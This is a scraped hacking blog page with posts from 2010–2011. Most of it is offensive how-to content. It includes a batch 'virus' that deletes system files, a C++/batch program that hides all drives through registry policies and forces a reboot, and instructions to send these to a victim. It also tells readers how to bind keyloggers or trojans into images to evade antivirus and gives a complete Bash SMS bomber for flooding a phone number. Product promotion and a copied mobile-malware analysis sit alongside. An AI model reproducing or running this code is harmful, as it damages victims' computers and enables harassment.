Information

The following is a guest post by email. This is the third part in a series of articles on his view of hacking. If you are interested in writing for CyberCROW, click Here. Otherwise, Enjoy.
Showing posts with label Viruses. Show all posts
Showing posts with label Viruses. Show all posts

Monday, April 11, 2011

How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.



About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:


Saturday, April 9, 2011

How to Hide Keyloggers and Trojan with Binders?

Posted by glewoCROW 11:58 AM, under ,,,,, | No comments

Keyloggers and Trojan can be onlye exe file so victims may be easily find it is some other softwares.  Here is tutorial to bind the keylogger or trojan with the Image files(jpeg,gif) or movie files.

What is binder software?
 A Binder is a software used to bind or combine to or more files under one name and extension, The files to be binded can have any extension or icon, Its all up to you and you have the choice to select the name, icon and various attributes of binded file, The Binded files can be even worse when they are crypted, because Bintext would not be able to find it and at the same time it could also bypass antivirus detection then you are almost guaranteed to be infected


Popular Binders

Here are some of the popular binders used by hackers to hide keyloggers and Trojans:

Simple Binder


 
Simple binder is one of my favorite binders of all time, I give thumbs up to the maker "Nathan", Its so easy to use and even a script kiddie can easily use it to bind keylogger or backdoors with other files


Weekend Binder




Weekend Binder can be used to bind two or more files under one extension and icon, If the binded file contains an application, the application also runs along with the actual binded files .


How to detect Crypted Binded files?
 



As I told you before that if a trojan or keylogger is binded with a file and it's crypted in order to bypass antivirus detection then its very difficult to detect it, However there is a great piece of software called resource hacker which is really effective when it comes to keylogger protection, It detects whether the file is binded or not.


What are the symptomps to find whether your system is infected or not?

Posted by glewoCROW 2:41 AM, under ,,,, | No comments


  • pc runs slower than usual.
  • Stops responding
  • computer crashes, and restarts every few minutes.
  • Applications on the computer do not work correctly.
  • Disks or disk drives are inaccessible.
  • Can't print items correctly.
  • Unusual error messages
  • Distorted menus and dialog boxes.
  • There is a double extension on an attachment that you recently opened, such as a .jpg, .vbs, .gif, or .exe. extension.
  • An antivirus program is disabled for no reason. Additionally, the antivirus program can't be restarted.
  • An antivirus program can't be installed on the computer, or the antivirus program won't run.
  • Strange Icons
  • Strange sounds or music plays from the speakers unexpectedly.
  • Windows does not start even though you have not made any system changes or even though you have not installed or removed any programs.
  • There is frequent modem activity. If you have an external modem, you may notice the lights blinking frequently when the modem is not being used. You may be unknowingly supplying pirated software
  • Windows does not start because certain important system files are missing. Additionally, you receive an error message that lists the missing files
  • The computer sometimes starts as expected. However, at other times, the computer stops responding before the desktop icons and the taskbar appear.

How To remove the virus/Spyware/malware?

Posted by glewoCROW 2:36 AM, under ,, | No comments

Hi friends , today i am going to explain how to remove the
virus/spyware /malware from your system. If you suspect that your system is infected(symptoms for infected system) ,then you need take care about your system.



The best Internet security tool is our Kaspersky.

Download the Kaspersky Internet Security trial version from www.kaspersky.com
Install the Kaspersky Internet security, then do full scan. Wait for
scanning completion. After scanning completed ,it will show the list
of infected files, right click and select "Disinfect all".
 
It will remove all virus/spyware or any other malwares. Now your system is virus protected. 


  If you like to make your system more secure, buy the Kaspersky Internet security key and install in your trial version internet security. Now it will become genuine.
  Don't use any cracked version of Kaspersky Internet
security or cracked key.

Tool for Remove Spyware and Trojans

Posted by glewoCROW 1:54 AM, under ,,,, | No comments


Instant Spyware remover
Hi friends now i am going to introduce a new spyware and trojan detecting software.  It is best software.  I had one Trojan namely  "xkmq47.exe@ ".  When i install this sofware ,it founds this file.  But i had doubt "is this spyware software working correctly or showing important files as trojan?".  So i searched for the definiton of  " xkmq47.exe@ " in google search engine.  At the end of the result I found another spyware removal tool(in next post i will post about that tools after i use it).  Finally i came to one conclusion that this spyware removal tool is working perfectly.

I like to share that spyware removal tool with you.  Its name is "Instand Spyware Remover". 



Instant Spyware Remover is an award-winning advanced anti-virus/spyware software. It is able to effectively detect, remove and block malicious Spyware/Trojan/Malware/Virus and other potential security threats which slow down computer, create unwanted pop-up ads, change computer settings and steal personal information without your knowledge. It is the best tool that perfectly secure your computer and your privacy.


Instant Spyware Remover is able to remove and block Spyware/Trojan/Malware/Virus including but not limit to:
  • Adware
  • Annoyance
  • Browser Helper Object
  • Cracking Tool
  • Dialer
  • Downloader
  • Encryption Tool
  • Exploit
  • Rogue Security Software
  • FTP Server
  • Hijacker
  • Hostile ActiveX
  • Key Logger
  • Nuker
  • Password Cracker
  • Phreaking Tool
  • Proxy
  • SPAM Tool
  • Tracking Cookie
  • Trojan
  • Worm Creation Tool
  • Usage Tracks
  • P2P
  • Mail Bomber
  • Phreaking Tool
  • .....

Instant Spyware Remover Key Features:

  • Anti-Virus - Completely detect and remove Viruses,Trojan, worms, and other PC threat faster and easier.
  • Anti-Spyware - Remove and block spyware program effectively, secure all your online activities.
  • Real-Time Guard - Protects your PC from spyware, virus and other potential threats on a real-time basis.
  • In-depth Online Scan - Performs in-depth online scan which guarantees to dig out all the hidden Virus/spyware in your computer.
  • Forcible Removal - Forcibly and completely removes virus or spyware programs that can repeatedly generate themselves.
  • Internet Safeguard - One click of cleaning Internet tracks which ensures the security of all your online personal information
  • Health Report - By analyzing, Instant Spyware Remover will generate a report which shows the health status of every part of your PC system
  • Optimization Utilities - Instant Spyware Remover offers you a suite of useful tools including Startup Optimizer, Vulnerability Scanner, Registry repairer, Registry Backup etc which allows you to have a smarter PC management and better performance.
Why Choose Instant Spyware Remover?
  • Anti-virus, spyware all in one.
  • In-depth & powerful online Scan.
  • Automatic threat removal process.
  • Friendly interface and easy to use.
  • Complete threat removal guarantees.
  • 60 days money back guarantee.
  • Free 24 X 7 dedicated technical support.
  • Up-to-date threat database.
  • Frequent & free program update.
Free Download Here
   http://www.instantspywareremoval.com/InstantSpywareRemoval.html

Introducing a new Task Manager for analysing process

Posted by glewoCROW 12:46 AM, under ,,,,, | No comments

Do you know what programs are processing in your pc?  You use Default task manager for seeing the list of Process.  In Default task manage it just show only the list of process and memory usage.   You may not know which one is system process,malware program,application program.  Some advanced users can analyze himself what process are going on.  He can end the process by right clicking on the process.  But this will stop the program at the moment only.  When he restart the system or after sometime,the process may continue.

To analyze the system program, detect the malware and stop the program i am going to introduce a new software "Security Windows Manager".



How did i find this software?
  Today i analyze the Task manager process.  At that time i suspect on one process.  so i searched in internet for definition of the program.  At the end i found  this wonderful security software.  I like to introduce to my visitors also.

The Security Task Manager detects unknown malware and rootkits hidden from your antivirus software.
Features:
  •  Show the Risk process at the top.
  • unique security risk rating 
  • free online scan with all known Antivirus engines
  • full directory path and file name
  • process description
  • CPU usage graph
  • embedded hidden functions (e.g. keyboard monitoring, browser supervision or manipulation)
  • process type (e.g. visible window, systray program, DLL, IE-plugin, startup service)
  • Move to quarantine the detected or suspected process
Screenshot:

Friday, April 8, 2011

Virus to Delete Mouse, Explore, LogOff Using Batch Programming

Posted by glewoCROW 12:36 AM, under ,,, | No comments

Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.




@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.


Command Line SMS Bomber for Linux Users

Posted by glewoCROW 12:33 AM, under ,,, | No comments

A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You'll need to install 'ssmtp'

If you're using Ubuntu or BT4 you can type:

Code:
sudo apt-get install ssmtp

You'll also need a Gmail account (I'm sure you could use another e-mail service, just make changes accordingly).

Then you'll need to edit the configuration file (located at /etc/ssmtp/ssmtp.conf)

Where it says:

Code:
# The place where the mail goes. The actual machine name is required no
# MX records are consulted. Commonly mailhosts are named mail.domain.com
mailhub=whatever
Change it to mailhub=smtp.gmail.com:587



Then add this at the end of the configuration file:

Code:
AuthUser=YOURUSERNAME@gmail.com
AuthPass=YOURPASSWORD
UseSTARTTLS=YES

Then, you'll need to save the following code as whatever you want (I call it smsbomber):
#! /bin/bash

COUNTER=0
SPEED=2
function usage {
echo "USAGE: $0 [OPTIONS] ... [ARGUMENTS]"
echo
echo "-p Phone Number"
echo "-c Carrier Code"
echo "-o Display Carrier Codes"
echo "-m Message to Send"
echo "-t Number of Times to Send Message"
echo "-d Delay (in seconds) Between Messages"
echo "-h This Help Screen"
echo
echo "You can check the carrier of a phone number"
echo "at www.fonefinder.net"
echo
echo "Instead of using a preset carrier code, you"
echo "can enter the SMS gateway of the carrier"
echo "using the '-c' option."
echo
echo "Written by MrPockets (aka GhostNode) and disk0"
exit
}

function carriers {
echo "Carrier Codes:"
echo
echo "1 AT&T"
echo "2 Boost Mobile"
echo "3 Cingular"
echo "4 Nextel"
echo "5 Sprint"
echo "6 Verizon or Straigh Talk"
echo "7 T-mobile"
echo "8 TracFone"
echo "9 US Cellular"
echo "10 Virgin Mobile"
exit
}

if [ "$1" == "" ]; then
usage
fi
while [ "$1" != "" ]; do
case "$1" in

'-p')
shift
NUMBER=$1
;;
'-c')
shift
case "$1" in
'1')
GATEWAY="@txt.att.net"
;;
'2')
GATEWAY="@myboostmobile.com"
;;
'3')
GATEWAY="@cingular.com"
;;
'4')
GATEWAY="@messaging.nextel.com"
;;
'5')
GATEWAY="@messaging.sprintpcs.com"
;;
'6')
GATEWAY="@vtext.com"
;;
'7')
GATEWAY="@tmomail.net"
;;
'8')
GATEWAY="@mmst5.tracfone.com"
;;
'9')
GATEWAY="@email.uscc.net"
;;
'10')
GATEWAY="@yrmobl.com"
;;
*)
GATEWAY=$1
;;
esac
;;
'-m')
shift
MESSAGE=$1
;;
'-d')
shift
SPEED=$1
;;
'-t')
shift
TIMES=$1
;;
'-h')
usage
;;
'-o')
carriers
;;
*)
usage
;;
esac
shift
done

echo >> delivery
echo >> delivery
echo $MESSAGE >> delivery
clear
echo " Attacking Device at: $NUMBER "
echo " With Message: $MESSAGE "

until [ $TIMES -le $COUNTER ]; do
ssmtp $NUMBER$GATEWAY < delivery sleep $SPEED COUNTER=$(($COUNTER +1)) echo ================================== echo echo "Attack $COUNTER of $TIMES" echo echo Message: $MESSAGE date echo "Ctrl+C to call off attack" echo ================================== done rm 1.txt rm delivery

Make sure you change the permissions to make it executable:

Code:
sudo chmod 777 smsbomber

Then you can just type ./smsbomber or ./smsbomber -h for the help menu. You gues should be able to figure it out from there! Let me know what you think!

Thursday, April 7, 2011

C++ ,Batch Virus code to disable All Hard disk

Posted by glewoCROW 8:03 PM, under ,,,, | No comments

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.



C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.


Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim



How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.

About Cmdow
Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:


Hacking Autorun.inf virus attack|Is autorun.inf virus?


When i  studied second year(cse), my friends told that autorun.inf is virus.  I thought so.  Because my antivirus blocks autorun.inf files.   In third year when i search about autorun.inf file in net, i realize about the auto run file.

 Today i bring some files from my college system.  When i insert the pen drive in my system, there are lot of exe files.They are viruses.  I delete all of them.  Finally i opened the autorun.inf file in notepad and saw the instructions.  Then only i remembered that i forget to post about autorun file.  This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:



[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:
[Autorun]
save the file as "autorun.inf" (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :
[Autorun]
This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:
open=virus.exe
This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.
Open=RECYCLER\Virus.exe
Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.


SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive's shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe



Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:
icon=WHCorp.ico
Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:
Label=Ethical hacking


Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

Saturday, November 6, 2010

The problems of classification with Viruses

Posted by glewoCROW 8:27 AM, under ,, | No comments

The problems of classification


One of the main issues in contemporary mobile malware research is
classification; specifically, labeling new samples correctly and
grouping them into the appropriate classes that reflect their behavior.
The main difficulty is that most new malicious programs for mobile
devices are hybrids, containing functionality from two or more different
types of malware.


The Kaspersky Lab classification system is clearly structured:


  • Behaviour: this shows what the program is, and what it does. Examples include Email-Worm, Trojan-Downloader, Trojan-Dropper.
  • Environment – i.e. the operating system or specific application
    within which the malicious program functions. Examples include Win32,
    MSWord, Linux, VBS
  • The family name and the variant identifier (letters).

There are few, if any, problems when it comes to the family name and
variant ID. Occasionally it is difficult to choose a family name, but
this is discussed in more detail below.


Sometimes it is difficult to identify the environment. Currently,
most cases of mobile malware involve malicious programs written for the
Symbian operating system, which we denote with “SymbOS”. However, more
and more frequently users are wanting to know which particular Symbian
Series a particular piece of malware is coded for. “Will a given Trojan
only function in Symbian Series 60 SE, or will it also attack devices
running under Series 80?”, and so on. In our classification system for
computer malware, we do identify the specific Windows version: Win16,
Win9x, Win32. So it’s possible that in future we will need to include
numbers in our Symbian classification as well.


In terms of mobile malware, identifying the Symbian series is the
least of our problems. Things get much more complicated when we examine
Windows Mobile.


For instance, there are viruses that were written for Windows CE
2003. We named this environment WinCE. However, malware written for
Windows Mobile 5.0 doesn’t function under Windows CE. Moreover, Windows
Mobile does not fully replace Windows CE, since we also have Windows
Pocket PC. Mobile and Pocket PC both use a set of functions which are
also used by Windows CE, but then have their own specific applications
and peculiarities.


As a result, it is very difficult to use the existing classification
system to give a specific piece of malware a precise name that reflects
its behavior.


Additionally, a number of viruses require that .NET for WinCE/
Windows Mobile be installed in order for them to function. In such
cases, we use the designation MSIL for the environment, which does not
underline the fact that the malware was coded for mobile devices.


Confused yet? This is just the tip of the iceberg. The most
complicated part of naming mobile malware is choosing the behavior.
This is where serious complications are caused by hybridization, as well
as cross platform mobile malware and the different naming conventions
used by different antivirus vendors.


A look at some examples will make the issue clearer.


Let us assume that we have a certain sis file (which in essence is an
archived installer). This file contains the files from Cabir, Comwar,
the Pbstealer Trojan, several Skuller.gen files and several empty files
(0 bits), which are a hallmark of Locknut. And if this wasn’t enough,
this file also installs a Win32 virus to the phone’s memory card (just
like the Cardtrap Trojan).


Based on our current classification system, we would call this a
Trojan-Dropper. But not in this case! Cabir, once installed, will send
the sis file via Bluetooth. Does this mean the sis file is a worm?
And if so, what do we call it? Cabir? Impossible. We can’t call it
Cabir and give it a new variant ID because 90% of the sis file contents
have nothing to do with Cabir. Naming it Cabir would only confuse users.


What about Skuller, Locknut or Cardtrap? But none of these names
alone are applicable, since the new sample is a hybrid. As a result,
the sis file is most likely to be called a Trojan and given a family
name of an existing family from our collection. This name will be chosen
on the basis of secondary traits, such as being written by the same
author.


Such complex situations are rare for computer viruses, but are the
norm for mobile malware. It’s possible that as primitive vandal Trojans
become fewer, (as mentioned above) as described above, the world of
mobile malware will become more structured.


Let’s examine another case. We have a worm that runs under Win32.
When it is launched on a PC, among other things, it creates a sis file
on the E: \ drive. As a rule, Symbian phones connect to PCs via this
drive. The sis file contains several blank/empty files and these are
used to overwrite a number of the phone’s system applications. This sis
file also contains the same Win32 worm, which copies itself onto the
phone’s memory card together with an autorun.inf file. If the infected
phone is connected to a clean computer and an attempt is made to access
the memory card from the PC, the worm will be launched and the clean
computer infected.


This is an example of a cross-platform virus which is capable of
running under two operating systems: Symbian and Windows. A worm like
this exists - it's called Mobler. But how should it be classified?


For cross-platform viruses, we used the “Multi” identifier.
Worm.Multi.Mobler? Unfortunately, users can’t tell from this name that
the virus poses a threat to Symbian smartphones. We believe that the
best way to classify this program is in accordance with its two
components: the win32 file is classified as Worm.Win32.Mobler, and the
sis file as Worm.SymbOS.Mobler.


However, other antivirus companies don't classify the sis file either
as Mobler, or as a worm. They call this program Trojan.SymbOS.Cardtrap,
because, according to their classification systems, any malicious
program which installs a Win32 malicious program to the memory card is
Cardtrap. But this malicious program doesn’t install a random Trojan, it
installs its own main component and sends a copy of itself only to
other operating systems. However, the strict criteria imposed by
antivirus companies' classification mean that the square pegs have to be
forced into round holes. And at the end of the day this means everybody
loses - both the users and the antivirus companies themselves.


If we start from the assumption that the propagation methods and
behaviours of many mobile viruses will be fundamentally different from
anything we’ve seen before, this means that we will have to create new
classes in order to reflect this. For instance, Cabir (or any worm which
propagates via Bluetooth) could logically be classified as a
Bluetooth-Worm (as could Inqtana, a worm for Mac OS). A worm which
propagates via MMS could be classified as an MMS-Worm. But what if the
worm sends itself via Bluetooth and via MMS? Which of these two
propagation methods is the most important? Kaspersky Lab would see MMS
as being the main propagation methods, but other antivirus companies
might think differently, giving priority to Bluetooth.


Sooner or later the antivirus industry will have to face the fact
that it’s essential to create a unified classification system for mobile
malware. This should be done as soon as possible before the situation
becomes critical, and before the confusion that reigns in terms of
classifying PC viruses (with viruses being given totally different names
by individual vendors) takes over the mobile malware world.
Unfortunately, the failure to create a unified classification system for
PC viruses does not leave much hope for the future in terms of mobile
malware classification.

Basics of Viruses

Posted by glewoCROW 8:11 AM, under ,, | No comments

One of the main differences in the technology used in viruses for
mobile devices and personal computers is that, although there are
numerous mobile virus families, very few mobile viruses are truly
original. This is similar to computer viruses in the late 1980s. Back
then, there were hundreds of viruses derived from the source code of
“base” malicious code. A multitude of malicious programs were based on
just three viruses: Vienna, Stoned and Jerusalem.
In terms of mobile malware, I would identify the following programs as
the “forebears” of other mobile viruses:

  • Cabir
  • Comwar
  • Skuller.gen

Cabir served as the basis for a number of its own variants, which
differ only in terms of the file names and the contents of the sis
installation files. Cabir was also used as the basis for such seemingly
dissimilar families as StealWar, Lasco and Pbstealer.

Lasco


Lasco was the first of these ”new” families to appear. In addition
to worm functionality, programs from this family are capable of
infecting files in the phone memory. Lasco’s evolution is a good
example of what happens when virus source code is made publicly
available. A Brazilian by the name of Marcos Velasco, who calls himself a
mobile virus expert, got hold of the source code for Cabir and began
writing viruses. During the last week of 2004 he sent several variants
of Cabir that he had written to antivirus companies. Some of them were
completely non-operational and all were categorized as Cabir variants.
This did not please the author; in an attempt to become famous he
created a variant of the worm that was also capable of infecting sis
files. This is how the Lasco worm came to be in antivirus databases.

Luckily, the idea of infecting files was not further developed by
virus writers, even though Velasco published the source code of his
creation on his website.
It is still not quite clear whether Cabir was actually used as a source
for Lasco. According to Marcos Velasco, he wrote all the code
independently, but the number of files, their names and operating
principles are very similar to Cabir. It’s possible to compare the main
functions in both worms and draw your own conclusions.

The function that sends the worm via Bluetooth (Cabir):

if(WithAddress)

{

        WithAddress = 0;

        Cancel();

        TBTSockAddr btaddr(entry().iAddr);

        TBTDevAddr devAddr;

        devAddr = btaddr.BTAddr();

        TObexBluetoothProtocolInfo obexBTProtoInfo;

        obexBTProtoInfo.iTransport.Copy(_L("RFCOMM"));

        obexBTProtoInfo.iAddr.SetBTAddr(devAddr);

        obexBTProtoInfo.iAddr.SetPort(0x00000009);

        obexClient = CObexClient::NewL(obexBTProtoInfo);

        if(obexClient)

        {

                iState = 1;

                iStatus = KRequestPending;

                Cancel();

                obexClient->Connect(iStatus);

                SetActive();

        }

}

else

{

        iState = 3;

        User::After(1000000);

}

return 0;

The function that sends the worm via Bluetooth (Lasco):

if ( FoundCell )

{

        FoundCell = _NOT;

        Cancel();

        TBTSockAddr addr( entry().iAddr );

        TBTDevAddr btAddress;

        btAddress = addr.BTAddr();

        TObexBluetoothProtocolInfo obexProtocolInfo;

        obexProtocolInfo.iTransport.Copy( _L( "RFCOMM" ) );

        obexProtocolInfo.iAddr.SetBTAddr( btAddress );

        obexProtocolInfo.iAddr.SetPort( 9 );

        if ( ( iClient = CObexClient::NewL( obexProtocolInfo ) ) )

        {

                iStatus = KRequestPending;

                BluetoothStatus
= _BLUETOOTH_NOT_CONNECTED;

                Cancel();

                iClient->Connect( iStatus );

                SetActive();

        }

}

else

{

        BluetoothStatus = _BLUETOOTH_CONNECTED;

}

}

Pbstealer


The first Trojan spy for Symbian, Pbstealer, is another Cabir
“offspring”. It was created in Asia, probably in China, and was found
on a hacked Korean website devoted to Legend of Mir, an online game.
This method of distribution and the fact that the Trojan was written
with criminal intent demonstrates how the “good intentions” of Cabir’s
author paved the way for the development of further malware.

The function that enabled the Trojan to send files via Bluetooth came
from Cabir. However, authors of the Trojan made one important
modification to the original code. The Trojan searches for the phone’s
address book and sends data contained in it via Bluetooth to the first
device found. Hence the name Pbstealer, which stands for “Phonebook
Stealer”. Until then cybercriminals used various vulnerabilities in the
Bluetooth protocol to steal such information, e.g., BlueSnarf. This
Trojan, however, greatly extended the possibilities available.

And, of course, Cabir became the carrier of choice for a variety of
other Trojans. More than half of all Skuller, Appdisabler, Locknut,
Cardtrap and other “vandal” Trojan variants contain Cabir, which has
been modified to spread not only itself, but the whole Trojan package.
This sort of hybridization has led to significant difficulties in
categorizing many malicious programs. We will discuss this in greater
detail below.

Comwar


A second landmark in the development of mobile malware was Comwar,
the first worm to spread via MMS. Like Cabir, it can spread via
Bluetooth, but MMS is the principal method used, making this worm
potentially extremely dangerous.
Bluetooth operates within a distance of 10 to 15 meters and other
devices can be infected only if they are within this range. MMS has no
boundaries and can be instantly sent even to handsets in other
countries.

The author of Cabir initially considered this idea, but chose
Bluetooth for quite obvious (from the viewpoint of 29A ideology)
reasons:

«mms: Its easy to route over the agent searching
phone numbers and sending them a mms message with the worm attached, but
we have two problems:
  • We dont know what type of phone are we sending the mms. We dont know
    if that phone is able to receive mms message or if it could execute the
    worm.

  • We are spending the money of the phone.»

The second reason is telling: it means that the author of Cabir did
not wish to do financial harm to users. The author of Comwar, on the
other hand, had no qualms about this whatsoever.

Although the technology that makes it possible to send malware via
MMS is the most attractive to the authors of mobile malware, so far
we’ve only seen the usual transformations performed on the original
worm, with baby hackers changing file names and texts in the original
files without making any changes to Comwar’s functionality. This is due
to the fact that the source code for Comwar has not been published and
the script kiddies don’t know the procedure used to send infected MMS
messages.

Currently, we know of 7 modifications of this worm. Four of them include an “author’s signature”.

CommWarrior v1.0b (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it in it's original unmodified form.

Comwar.b:


CommWarrior v1.0 (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it in it's original unmodified form.

Comwar.c:


CommWarrior Outcast: The dark side of Symbian Force.

CommWarrior v2.0-PRO. Copyright (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it

in it's original unmodified form.

With best regards from Russia.

Comwar.d:


Does not contain any distinguishing texts. MMS texts replaced with Spanish texts.

Comwar.e:


WarriorLand v1.0A (c) 2006 by Leslie

Also contains texts in Spanish.

Comwar.f:


Does not contain any distinguishing texts. MMS texts replaced with Spanish texts.

Comwar.g:


CommWarrior Outcast: The Dark Masters of Symbian.

The Dark Side has more power!

CommWarrior v3.0 Copyright (c) 2005-2006 by e10d0r

CommWarrior is freeware product. You may freely distribute it in it's original unmodified form.

In addition to the above, variant .g was the first variant to include
file infector functionality. The worm looks for other sis files in the
phone’s memory and appends its code to these files. This provides one
more propagation method in addition to the traditional MMS and
Bluetooth.

It should be noted that so far Comwar has not spawned a multitude of
other families. As mentioned above, the reason for this is that its
source code has not been published. Just like Cabir, it is used as a
carrier for other Trojan programs. Apparently, the only program using
Comwar that can lay claim to having started a new family is StealWar.
This is a worm that combines Cabir, Comwar and the Trojan Pbstealer.
This type of combination is highly dangerous and capable of spreading
widely.

However, it’s inevitable that propagation via MMS will eventually
become the most common method of propagation for mobile malware. This is
all the more likely because there is already a serious known MMS
handling vulnerability in Windows Mobile 2003, which leads to a buffer
overflow and the execution of arbitrary code. The vulnerability was
reported by Collin Mulliner in August 2006 at the DefCon conference.



Demonstration of the MMS vulnerability(Collin Mulliner, Advanced Attacks Against PocketPC Phones).

Detailed information about the vulnerability will not be available to
the general public until Microsoft releases the relevant update.
However, the absence of information doesn’t make the vulnerability any
less dangerous. If somebody creates a worm that launches itself
automatically, without the user’s participation when it gets into a
smartphone memory, this could cause a global outbreak.

Comwar also contributed to the evolution of mobile malware with a
technology implemented in variant .c; this technology could be seen as
rootkit technology. The worm conceals itself in the list of processes
and is not visible in the standard list of applications currently
running. Comwar is able to do this because its process is designated as
“system”. Although the process can easily be discovered using other
programs for viewing running processes, this masking method is
nevertheless now being used in some other malicious programs for
Symbian.

Skuller


As mentioned above, Skuller is the most numerous family of mobile
Trojans: by September 1st, 2006 we had seen 31 variants. This is not
surprising, as these programs are the most primitive malicious programs
for Symbian. Any person who can use a utility for creating sis files
will be able to create a Trojan of this kind. The rest of the work is
done by the vulnerabilities present in Symbian: it is possible to
overwrite any files, including system files, and the system becomes very
unstable when it comes across unexpected files (i.e. files that are
damaged or not standard format for the relevant version of the system).

Most Skuller variants are based on two files, which we classify as
Skuller.gen, and it’s these files that distinguish Skuller from other
families with similar functionality (e.g., Doombot or Skudoo):

  • a file with the same name as the application it
    replaces and the extension “aif”. Its size is 1601 bytes. This is an
    icon file containing the skull icon. The file also contains the
    following text string: “↑Skulls↑Skulls”;
  • a file that has the same name as the application it
    replaces and the extension “app”. Its size is 4796 bytes. This is an
    EPOC application, a “dummy” file.

Current mobile malware types and families

Posted by glewoCROW 3:24 AM, under ,, | No comments

Autumn 2004 was when mobile malware started to evolve in three main
areas. One was Trojan programs which are designed for financial gain.
The first mobile Trojan was Mosquit.a. In theory, it’s a harmless
mobile phone game; however, at some point it starts to send numerous SMS
